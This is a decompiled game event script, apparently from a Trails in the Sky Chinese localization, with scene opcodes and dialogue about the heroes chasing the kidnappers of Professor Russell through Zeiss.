def lambda_5527(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_5527) def lambda_5535(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x9, 1, lambda_5535) def lambda_5543(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x8, 1, lambda_5543) def lambda_5551(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0xB, 1, lambda_5551) Sleep(400) ChrTalk( 0x101, "#004F#2P咦……\x02", ) CloseMessageWindow() ChrTalk( 0x9, "#802F#2P提妲？\x02", ) CloseMessageWindow() ChrTalk( 0x107, ( "#062F我对中央工房里面的环境\x01", "比较熟悉……\x02\x03", "所以所以……\x01", "我可以为艾丝蒂尔姐姐你们带路。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#003F#2P提妲……\x02\x03", "#002F明白了，一起来吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#012F#5P不过，一旦有危险的话，\x01", "你一定要马上离开，知道吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#063F嗯、嗯……\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#155F那、那个～\x01", "我也要跟你们一起……\x02", ) ) CloseMessageWindow() def lambda_56B3(): TurnDirection(0xFE, 0x8, 400) ExitThread() QueueWorkItem(0x101, 1, lambda_56B3) def lambda_56C1(): TurnDirection(0xFE, 0x8, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_56C1) def lambda_56CF(): TurnDirection(0xFE, 0x8, 400) ExitThread() QueueWorkItem(0x107, 1, lambda_56CF) Sleep(400) ChrTalk( 0x101, "#002F#2P不行。\x02", ) CloseMessageWindow() ChrTalk( 0x102, ( "#015F#5P对不起。\x01", "你还是留在这里吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#154F唔～好果断的回答啊……\x02\x03", "不过没办法了。\x01", "你们三个要小心哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#800F#2P假如博士在里面的话，\x01", "你们上三楼的工作室就应该能找到他。\x02\x03", "先去那里确认一下吧。\x02", ) ) CloseMessageWindow() def lambda_5805(): TurnDirection(0xFE, 0x9, 400) ExitThread() QueueWorkItem(0x101, 1, lambda_5805) def lambda_5813(): TurnDirection(0xFE, 0x9, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_5813) def lambda_5821(): TurnDirection(0xFE, 0x9, 400) ExitThread() QueueWorkItem(0x107, 1, lambda_5821) Sleep(400) ChrTalk( 0x101, "#006F嗯，明白！\x02", ) CloseMessageWindow() ChrTalk( 0x102, "#012F那么我们去了。\x02", ) CloseMessageWindow() OP_44(0x21, 0x1) OP_44(0x11, 0x1) OP_44(0x1F, 0x1) OP_44(0x1C, 0x1) OP_44(0x1B, 0x1) OP_44(0x17, 0x1) OP_44(0xB, 0x1) OP_44(0xA, 0x1) OP_44(0x24, 0x1) OP_4B(0x21, 0) OP_4B(0x11, 0) OP_4B(0x1F, 0) OP_4B(0x1C, 0) OP_4B(0x1B, 0) OP_4B(0x17, 0) OP_4B(0xB, 0) OP_4B(0xA, 0) OP_4B(0x24, 0) ClearChrFlags(0x1C, 0x40) ClearChrFlags(0x1B, 0x40) ClearChrFlags(0x17, 0x40) ClearChrFlags(0xB, 0x40) ClearChrFlags(0x11, 0x40) ClearChrFlags(0x22, 0x40) ClearChrFlags(0x23, 0x40) ClearChrFlags(0x11, 0x4) ClearChrFlags(0x22, 0x4) ClearChrFlags(0x23, 0x4) OP_4B(0xA, 255) OP_4B(0x9, 255) OP_4B(0xB, 255) OP_4B(0x8, 255) OP_43(0x9, 0x0, 0x0, 0x3) OP_43(0xA, 0x0, 0x0, 0x3) OP_43(0xB, 0x0, 0x0, 0x3) OP_8C(0x8, 270, 0) SetMapFlags(0x2000000) SetMapFlags(0x800) OP_A2(0x52C) EventEnd(0x0) Return() # Function_47_4AD9 end def Function_48_5917(): pass label("Function_48_5917") EventBegin(0x0) OP_6D(-35220, 10000, 59310, 0) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_4A(0x21, 0) OP_4A(0x11, 0) OP_4A(0x1F, 0) OP_4A(0x1C, 0) OP_4A(0x1B, 0) OP_4A(0x17, 0) OP_4A(0xB, 0) OP_4A(0xA, 0) OP_4A(0x24, 0) SetChrPos(0x1C, -26070, 8000, 62840, 63) SetChrPos(0x1B, -25060, 8000, 63650, 180) SetChrPos(0x24, -24740, 8000, 62540, 3) SetChrPos(0xB, -37650, 10000, 59010, 0) SetChrPos(0xA, -28440, 8000, 62590, 129) SetChrPos(0x9, -26520, 8000, 57300, 0) SetChrPos(0x101, -34600, 10000, 59260, 90) SetChrPos(0x106, -35290, 10000, 58430, 90) SetChrPos(0x102, -35240, 10000, 60170, 90) SetChrPos(0x107, -35880, 10000, 59390, 90) ClearChrFlags(0x9, 0x80) ClearChrFlags(0x8, 0x80) SetChrPos(0x9, -26240, 8000, 58320, 270) SetChrPos(0x8, -27270, 8000, 58010, 270) OP_4A(0x9, 255) OP_4A(0x8, 255) def lambda_5A3E(): label("loc_5A3E") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_5A3E") QueueWorkItem2(0x8, 1, lambda_5A3E) def lambda_5A4F(): label("loc_5A4F") TurnDirection(0xFE, 0x101, 400) OP_48() Jump("loc_5A4F") QueueWorkItem2(0x9, 1, lambda_5A4F) def lambda_5A60(): OP_8E(0xFE, 0xFFFF9232, 0x1F40, 0xE6AA, 0x1388, 0x0) ExitThread() QueueWorkItem(0x106, 2, lambda_5A60) def lambda_5A7B(): OP_8E(0xFE, 0xFFFF9458, 0x1F40, 0xEA1A, 0x1388, 0x0) ExitThread() QueueWorkItem(0x101, 2, lambda_5A7B) def lambda_5A96(): OP_8E(0xFE, 0xFFFF9764, 0x1F40, 0xED3A, 0x1388, 0x0) ExitThread() QueueWorkItem(0x102, 2, lambda_5A96) def lambda_5AB1(): OP_8E(0xFE, 0xFFFF8F30, 0x1F40, 0xEC86, 0x1388, 0x0) ExitThread() QueueWorkItem(0x107, 2, lambda_5AB1) def lambda_5ACC(): OP_6D(-27780, 8000, 59800, 2000) ExitThread() QueueWorkItem(0x101, 3, lambda_5ACC) def lambda_5AE4(): OP_6B(2700, 2000) ExitThread() QueueWorkItem(0x102, 3, lambda_5AE4) FadeToBright(1000, 0) def lambda_5AFD(): label("loc_5AFD") TurnDirection(0xFE, 0x8, 400) OP_48() Jump("loc_5AFD") QueueWorkItem2(0x106, 1, lambda_5AFD) def lambda_5B0E(): label("loc_5B0E") TurnDirection(0xFE, 0x9, 400) OP_48() Jump("loc_5B0E") QueueWorkItem2(0x101, 1, lambda_5B0E) def lambda_5B1F(): label("loc_5B1F") TurnDirection(0xFE, 0x9, 400) OP_48() Jump("loc_5B1F") QueueWorkItem2(0x102, 1, lambda_5B1F) def lambda_5B30(): label("loc_5B30") TurnDirection(0xFE, 0x9, 400) OP_48() Jump("loc_5B30") QueueWorkItem2(0x107, 1, lambda_5B30) WaitChrThread(0x101, 0x3) ChrTalk( 0x8, "#151F啊，小艾你们出来了～！\x02", ) CloseMessageWindow() ChrTalk( 0x9, ( "#801F哦哦，你们没事吧。\x02\x03", "刚才军队的人从里面走出来，\x01", "我还在想出什么事了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, "#055F#1P军队的人……！？\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#005F等、等一下！\x01", "不是穿黑衣服的家伙吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#802F你说什么呀？\x02\x03", "是身着蓝白色军装、\x01", "礼仪端正的王国军军人啊……\x02\x03", "听说他们是从\x01", "艾尔·雷登关所派来的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#151F从那军装来看，\x01", "他们的确是女王陛下的亲卫队呢～\x02\x03", "他们样子好帅哦～\x01", "我毫不犹豫地拍了照片呢～\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#004F亲卫队……的人！？\x02", ) CloseMessageWindow() ChrTalk( 0x102, ( "#012F就是在卢安\x01", "把市长逮捕的那些军人吧。\x02\x03", "但是，他们怎么会在这里……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#062F那、那个！\x02\x03", "工房长叔叔，\x01", "那些人没带着爷爷吗！？\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#805F带、带着拉赛尔博士！？\x02\x03", "没、没有……\x01", "可是他们带着很大包的货物……\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#065F！！！\x02", ) CloseMessageWindow() ChrTalk( 0x101, "#005F没错，就是他们！\x02", ) CloseMessageWindow() ChrTalk( 0x106, ( "#057F#1P那些杂碎……\x01", "在导力梯里换成军服吗……\x02\x03", "#056F哼，太瞧不起人了吧！\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#802F等、等一下！\x01", "这到底是怎么回事……\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#016F详细情况我们之后会向您汇报。\x02\x03", "请问工房长先生，\x01", "那些军人往哪个方向去了？\x02", ) ) CloseMessageWindow() ChrTalk( 0x9, ( "#805F说、说是有急事，\x01", "往城镇市街区方向去了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, "#054F#1P快追！\x02", ) CloseMessageWindow() SetChrFlags(0x106, 0x40) def lambda_603E(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1770, 0x0) ExitThread() QueueWorkItem(0x106, 1, lambda_603E) Sleep(200) ChrTalk( 0x101, "#005F决不能让他们逃走！\x02", ) CloseMessageWindow() def lambda_608A(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1770, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_608A) Sleep(400) def lambda_60AA(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1770, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_60AA) Sleep(100) def lambda_60CA(): OP_8E(0xFE, 0xFFFFCC7A, 0x1F40, 0xEB1E, 0x1388, 0x0) ExitThread() QueueWorkItem(0x107, 1, lambda_60CA) Sleep(2000) OP_20(0x5DC) FadeToDark(1500, 0, -1) OP_0D() OP_21() SoundDistance(0xA0, 0xFFFFEDF4, 0x14C8, 0xE790, 0x2710, 0x7530, 0x1, 0x0) Sleep(500) AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "虽然艾丝蒂尔他们\x01", "分头在蔡斯市的市街区寻找犯人的踪迹……\x02", ) ) CloseMessageWindow() AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "但即使是挨家挨户地寻找，\x01", "仍然没能找到博士和绑架博士的黑衣人。\x02", ) ) CloseMessageWindow() AnonymousTalk( ( scpstr(SCPSTR_CODE_COLOR, 0x5), "不久，位于湖畔上的雷斯顿要塞接到通报，\x01", "派出了王国军的部队前来中央工房……\x02", ) ) CloseMessageWindow() OP_56(0x0) FadeToBright(300, 0) ClearMapFlags(0x40000000) ClearMapFlags(0x2000000) OP_A2(0x536) OP_28(0x41, 0x1, 0x40) ClearMapFlags(0x800) OP_A2(0x3FA) NewScene("ED6_DT01/T3115 ._SN", 100, 0, 0) IdleLoop() Return() # Function_48_5917 end def Function_49_6273(): pass label("Function_49_6273") EventBegin(0x0) OP_6D(-36480, 10000, 59730, 0) OP_67(0, 7190, -10000, 0) OP_6B(3350, 0) OP_6C(315000, 0) OP_6E(262, 0) OP_44(0x11, 0xFF) SetChrPos(0x11, -23800, 10000, 46930, 180) OP_43(0x11, 0x0, 0x0, 0x3) RemoveParty(0xF, 0xFF) SetChrPos(0x101, -34420, 10000, 58850, 270) SetChrPos(0x107, -34550, 10000, 57970, 315) SetChrPos(0x106, -33590, 10000, 59410, 270) SetChrPos(0x102, -34780, 10000, 59820, 225) SetChrFlags(0x8, 0x40) ClearChrFlags(0x8, 0x80) SetChrPos(0x8, -36000, 10000, 58980, 90) OP_4A(0x8, 255) OP_6F(0x0, 60) FadeToBright(1000, 0) OP_0D() ChrTalk( 0x8, ( "#153F#1P啊，对了～\x01", "还得去买感光结晶回路才行呢。\x02\x03", "#150F那我先告辞啦～\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#501F啊，嗯。\x01", "朵洛希也辛苦了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#154F#1P没有啦。\x01", "我可是一点忙也没帮上呢～\x02\x03", "我也会去问问编辑部，\x01", "调查看看有没有什么情报。\x02", ) ) CloseMessageWindow() TurnDirection(0x8, 0x107, 400) ChrTalk( 0x8, ( "#150F#1P所以……\x01", "小提，打起精神来哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F啊……\x02\x03", "好的……\x01", "谢谢……朵洛希姐姐。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#150F#1P不用担心啦～\x01", "小艾和小约还有红头发大哥\x01", "一定会平安无事地救出你爷爷的。\x02\x03", "#151F那么，再见啦～\x02", ) ) CloseMessageWindow() OP_8C(0x8, 270, 400) def lambda_652F(): OP_6D(-35480, 10000, 59730, 1000) ExitThread() QueueWorkItem(0x8, 2, lambda_652F) OP_8E(0x8, 0xFFFF6D02, 0x2710, 0xE66E, 0xBB8, 0x0) OP_6F(0x0, 60) OP_70(0x0, 0x0) SetChrFlags(0x8, 0x80) WaitChrThread(0x8, 0x2) ChrTalk( 0x107, "#063F…………………………\x02", ) CloseMessageWindow() def lambda_6581(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x106, 1, lambda_6581) def lambda_658F(): TurnDirection(0xFE, 0x107, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_658F) TurnDirection(0x101, 0x107, 400) ChrTalk( 0x101, ( "#006F#5P提妲……\x02\x03", "#006F打起精神来吧，\x01", "博士他一定会没事的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F#2P是啊，他们应该不会\x01", "伤害王国第一的天才学者的。\x02", ) ) CloseMessageWindow() TurnDirection(0x107, 0x102, 400) ChrTalk( 0x107, ( "#063F艾丝蒂尔姐姐、约修亚哥哥……\x02\x03", "#067F嗯……是呢。\x01", "爷爷一定会没事的……\x02", ) ) CloseMessageWindow() ChrTalk( 0x106, "#552F…………………………\x02", ) CloseMessageWindow() OP_62(0x101, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) OP_22(0x26, 0x0, 0x64) Sleep(1000) OP_8C(0x101, 90, 400) ChrTalk( 0x101, "#004F#5P怎么啦，又板着一张严肃脸？\x02", ) CloseMessageWindow() def lambda_6710(): TurnDirection(0xFE, 0x106, 400) ExitThread() QueueWorkItem(0x102, 1, lambda_6710) def lambda_671E(): TurnDirection(0xFE, 0x106, 400) ExitThread() QueueWorkItem(0x107, 1, lambda_671E) ChrTalk( 0x106, ( "#053F……没什么。\x02\x03", "#050F时间紧迫，\x01", "我们快点去协会吧。\x02", ) ) CloseMessageWindow() OP_28(0x41, 0x1, 0x80) EventEnd(0x0) Return() # Function_49_6273 end def Function_50_6778(): pass label("Function_50_6778") EventBegin(0x0) OP_6D(-22950, 8000, 63790, 0) OP_67(0, 11000, -10000, 0) OP_6B(2800, 0) OP_6C(315000, 0) OP_6E(262, 0) SetChrPos(0x102, -22960, 8000, 73260, 0) SetChrPos(0x101, -21990, 8000, 74030, 0) SetChrPos(0x107, -23770, 8000, 73860, 0) def lambda_67F0(): OP_8E(0xFE, 0xFFFFA646, 0x1F40, 0xF5F0, 0xBB8, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_67F0) Sleep(300) def lambda_6810(): OP_8E(0xFE, 0xFFFFA934, 0x1F40, 0xF9BA, 0xBB8, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_6810) Sleep(300) def lambda_6830(): OP_8E(0xFE, 0xFFFFA4C0, 0x1F40, 0xFABE, 0xBB8, 0x0) ExitThread() QueueWorkItem(0x107, 1, lambda_6830) FadeToBright(1000, 0) WaitChrThread(0x102, 0x1) OP_8C(0x102, 0, 400) WaitChrThread(0x101, 0x1) OP_8C(0x101, 270, 400) WaitChrThread(0x107, 0x1) OP_8C(0x107, 135, 400) ChrTalk( 0x102, ( "#010F接下来，\x01", "我们先去游击士协会一趟吧。\x02\x03", "说不定雾香小姐已经问到\x01", "有关黑衣人那艘飞艇的情报。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#006F嗯，如果能从王国军那里\x01", "得到什么情报就好了……\x02\x03", "#004F啊，提妲也一起来吗？\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#560F那、那个……\x02\x03", "不好意思呢。\x01", "我想去照看阿加特大哥哥。\x02\x03", "他还没醒过来，\x01", "我有点放心不下呢……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#501F提妲……\x02\x03", "#001F明白了。\x01", "博士的事就交给我们吧！\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, ( "#063F对不起……\x01", "我老是给姐姐你们添麻烦……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#506F你这孩子真是的～\x01", "又在跟我们客气起来了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#010F虽然阿加特兄现在还没醒来，\x01", "不过只要有朋友陪在旁边，\x01", "自己休息的时候也会安心许多吧。\x02\x03", "阿加特兄就拜托你了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x107, "#560F嗯、嗯……！\x02", ) CloseMessageWindow() def lambda_6B54(): label("loc_6B54") TurnDirection(0xFE, 0x107, 0) OP_48() Jump("loc_6B54") QueueWorkItem2(0x101, 1, lambda_6B54) def lambda_6B65(): label("loc_6B65") TurnDirection(0xFE, 0x107, 0) OP_48() Jump("loc_6B65") QueueWorkItem2(0x102, 1, lambda_6B65) OP_8C(0x107, 225, 400) def lambda_6B7D(): OP_6C(270000, 2000) ExitThread() QueueWorkItem(0x107, 1, lambda_6B7D) def lambda_6B8D(): OP_6D(-22510, 8000, 63590, 2000) ExitThread() QueueWorkItem(0x107, 2, lambda_6B8D) OP_8E(0x107, 0xFFFF9124, 0x1F40, 0xEDBC, 0x1388, 0x0) OP_8E(0x107, 0xFFFF770C, 0x2710, 0xE95C, 0x1388, 0x0) SetChrFlags(0x107, 0x80) ChrTalk( 0x101, ( "#006F啊啊～\x01", "提妲这孩子真是又坚强又可爱。\x02\x03", "对那个爱闹别扭的刀子嘴\x01", "根本用不着那么温柔嘛。\x02", ) ) CloseMessageWindow() OP_44(0x101, 0xFF) OP_44(0x102, 0xFF) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F好了好了，别吃醋了。\x02\x03", "说起来，\x01", "你和阿加特兄性格倒挺相似的。\x02", ) ) CloseMessageWindow() OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1) OP_22(0x27, 0x0, 0x64) Sleep(1000) TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#004F啊！？\x02\x03", "#009F真、真讨厌～\x01", "我和那家伙哪里相似了？\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#019F行事比较冲动啦，\x01", "又爱做老好人啦。\x02\x03", "#010F阿加特兄虽然说话刻薄了点，\x01", "但却很会为对方着想。\x02\x03", "这一点，\x01", "我想提妲也应该很清楚吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#509F唔唔……\x01", "虽然有点难以理解……\x02\x03", "#007F不说这个了，\x01", "总之先去协会问问看吧。\x02\x03", "希望在那刀子嘴伤势康复之前，\x01", "能够查到什么线索，然后做点成绩给他看。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, "#019F哈哈，是啊。\x02", ) CloseMessageWindow() SetChrPos(0x107, -22820, 8000, 62610, 0) EventEnd(0x0) RemoveParty(0x6, 0xFF) Return() # Function_50_6778 end def Function_51_6ECF(): pass label("Function_51_6ECF") ClearMapFlags(0x2000000) EventBegin(0x0) OP_6D(-23500, 8000, 69230, 0) OP_67(0, 8490, -10000, 0) OP_6B(3000, 0) OP_6C(306000, 0) OP_6E(262, 0) SetChrPos(0x101, -24660, 8000, 82550, 0) SetChrPos(0x102, -22920, 8000, 83030, 0) def lambda_6F3B(): OP_8E(0xFE, 0xFFFFA146, 0x1F40, 0x10E28, 0x1388, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_6F3B) Sleep(500) def lambda_6F5B(): OP_8E(0xFE, 0xFFFFA7CC, 0x1F40, 0x111DE, 0x1388, 0x0) ExitThread() QueueWorkItem(0x102, 1, lambda_6F5B) WaitChrThread(0x101, 0x1) OP_8C(0x101, 0, 400) ChrTalk( 0x101, "#007F哈啊～吓了我一跳呢。\x02", ) WaitChrThread(0x101, 0x1) TurnDirection(0x102, 0x101, 400) CloseMessageWindow() ChrTalk( 0x102, ( "#012F再磨磨蹭蹭的话，\x01", "情报部那些人就要过来了……\x02\x03", "我们直接出城吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#002F嗯，知道了。\x02\x03", "唔……去王都的话，\x01", "应该从东边的街道走吧？\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#012F没错，沿着利塔街道往北走，\x01", "到达『圣海姆门』就可以了。\x02\x03", "穿过大门，\x01", "就进入王都格兰赛尔地区了。\x02", ) ) CloseMessageWindow() OP_28(0x54, 0x1, 0x10) OP_20(0x5DC) Sleep(500) EventEnd(0x0) OP_1D(0xD) Return() # Function_51_6ECF end def Function_52_7169(): pass label("Function_52_7169") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 4)), scpexpr(EXPR_END)), "loc_7264") EventBegin(0x1) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_71E4") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#012F我们最好不要靠近飞艇坪了。\x01", "　\x02\x03", "还是赶快出城去吧。\x01", "　\x02", ) ) CloseMessageWindow() Jump("loc_7246") label("loc_71E4") ChrTalk( 0x101, ( "#002F……情报部的人要从飞艇坪过来了。\x01", "　\x02\x03", "还是不要靠近为好。\x02", ) ) CloseMessageWindow() label("loc_7246") OP_90(0x0, 0x0, 0x0, 0xFFFFFA24, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) Jump("loc_7382") label("loc_7264") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x342)"), scpexpr(EXPR_EXEC_OP, "OP_40(0x341)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x340)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x343)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x344)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x345)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x35E)"), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 1)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_7295") Call(0, 53) Jump("loc_7382") label("loc_7295") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA5, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA6, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_7382") EventBegin(0x1) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7309") ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() Jump("loc_7367") label("loc_7309") TurnDirection(0x102, 0x0, 400) ChrTalk( 0x102, ( "#012F我担心博士的情况。\x01", "赶快去工房里面调查一下吧。\x02", ) ) CloseMessageWindow() label("loc_7367") OP_90(0x0, 0x0, 0x0, 0xFFFFFA24, 0xBB8, 0x0) Sleep(50) EventEnd(0x4) label("loc_7382") Return() # Function_52_7169 end def Function_53_7383(): pass label("Function_53_7383") EventBegin(0x1) Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x342)"), scpexpr(EXPR_EXEC_OP, "OP_40(0x341)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x340)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x343)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x344)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x345)"), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_73BA") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x35E)"), scpexpr(EXPR_END)), "loc_73B4") OP_A2(0x1C) Jump("loc_73B7") label("loc_73B4") OP_A2(0x1A) label("loc_73B7") Jump("loc_73EC") label("loc_73BA") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x35E)"), scpexpr(EXPR_END)), "loc_73EC") Jc((scpexpr(EXPR_EXEC_OP, "OP_40(0x342)"), scpexpr(EXPR_EXEC_OP, "OP_40(0x341)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x340)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x343)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x344)"), scpexpr(EXPR_OR), scpexpr(EXPR_EXEC_OP, "OP_40(0x345)"), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_73E9") OP_A2(0x1C) Jump("loc_73EC") label("loc_73E9") OP_A2(0x1B) label("loc_73EC") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 2)), scpexpr(EXPR_END)), "loc_763C") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_755D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_7486") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#017F我说，艾丝蒂尔。\x01", "还是先把资料室的书还回去吧？\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, "#008F啊，对、对啊。\x02", ) CloseMessageWindow() Jump("loc_755A") label("loc_7486") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F艾丝蒂尔，\x01", "说起来我们还没有把资料室的书还回去呢。\x02\x03", "在办理搭乘手续之前\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, ( "#000F啊，对了。\x01", "要赶快去一趟中央工房。\x02", ) ) CloseMessageWindow() label("loc_755A") Jump("loc_7639") label("loc_755D") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_75AA") ChrTalk( 0x102, ( "#010F在办理搭乘手续之前\x01", "先要把书还给资料室。\x02", ) ) CloseMessageWindow() Jump("loc_7639") label("loc_75AA") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F说起来，\x01", "我们还没有把资料室的书还回去呢。\x02\x03", "在办理搭乘手续之前\x01", "赶快去一趟中央工房吧。\x02", ) ) CloseMessageWindow() label("loc_7639") Jump("loc_7BE3") label("loc_763C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 3)), scpexpr(EXPR_END)), "loc_7868") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_7781") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_76DE") TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F我说，艾丝蒂尔。\x01", "要先去地下工场\x01", "把信交给菲小姐啊。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, "#000F嗯，走吧。\x02", ) CloseMessageWindow() Jump("loc_777E") label("loc_76DE") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F艾丝蒂尔，\x01", "我们最好先去把信送给菲小姐。\x02\x03", "在办理搭乘手续之前\x01", "去一趟地下工场吧。\x02", ) ) CloseMessageWindow() TurnDirection(0x101, 0x102, 400) ChrTalk( 0x101, "#004F哦，对了。\x02", ) CloseMessageWindow() label("loc_777E") Jump("loc_7865") label("loc_7781") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x3, 1)), scpexpr(EXPR_END)), "loc_77DA") ChrTalk( 0x102, ( "#010F我们要先去把信交给菲小姐啊。\x01", "　\x02", ) ) CloseMessageWindow() Jump("loc_7865") label("loc_77DA") OP_A2(0x19) TurnDirection(0x102, 0x101, 400) ChrTalk( 0x102, ( "#010F说起来，\x01", "还没有还没把信送给菲小姐呢。\x02\x03", "在办理搭乘手续之前\x01", "赶快去地下工场吧。\x02", ) ) CloseMessageWindow() label("loc_7865") 